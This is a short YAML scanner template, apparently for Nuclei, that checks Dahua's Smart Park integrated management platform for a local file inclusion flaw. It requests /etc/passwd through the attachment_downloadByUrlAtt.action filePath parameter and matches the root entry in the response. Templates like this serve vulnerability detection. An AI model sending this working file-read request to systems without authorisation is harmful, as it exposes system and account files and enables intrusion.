http:
    - host-redirects: true
      matchers:
        - regex:
            - 'root:[x*]:0:0:'
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      max-redirects: 2
      method: GET
      path:
        - '{{BaseURL}}/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd'
id: dahua-smart-park-download-fileread
info:
    author: SleepingBag945
    name: 大华智慧园区综合管理平台 - Local File Inclusion
    severity: high
    tags:
        - dahua
        - 大华智慧园区综合管理平台
